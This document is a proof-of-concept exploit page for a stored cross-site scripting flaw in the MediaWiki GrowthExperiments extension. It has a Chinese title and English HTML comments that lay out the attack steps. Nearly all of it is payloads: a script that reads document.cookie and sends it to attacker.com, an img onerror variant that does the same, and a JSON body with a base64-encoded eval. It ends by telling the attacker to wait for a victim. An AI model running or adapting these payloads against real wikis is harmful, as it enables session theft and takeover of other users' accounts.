CVE-2026-22713 MediaWiki GrowthExperiments跨站脚本(XSS)漏洞

<!-- CVE-2026-22713 PoC - MediaWiki GrowthExperiments XSS --> <!-- This PoC demonstrates the stored XSS vulnerability in MediaWiki GrowthExperiments Extension --> <!-- Affected versions: 1.39, 1.43, 1.44, 1.45 --> <!-- Step 1: Identify the vulnerable input field in GrowthExperiments --> <!-- The vulnerability exists in user preference/settings fields --> <!-- Step 2: Inject malicious XSS payload --> <!-- Example payload targeting user configuration: --> <script>alert('XSS - CVE-2026-22713')</script> <!-- More advanced payload for cookie stealing: --> <script> var stolen_cookie = document.cookie; var img = new Image(); img.src = 'https://attacker.com/steal?cookie=' + encodeURIComponent(stolen_cookie); </script> <!-- Alternative payload using img onerror: --> <img src=x onerror="this.src='https://attacker.com/log?c='+document.cookie"> <!-- JSON-based payload for API endpoints: --> { "username": "<script>alert(document.domain)</script>", "preference": "GrowthExperiments", "value": "<img src=x onerror=eval(atob('YWxlcnQoJ1hTUycpOw=='))>" } <!-- Step 3: Wait for victim to visit the affected page --> <!-- The script will execute in victim's browser context -->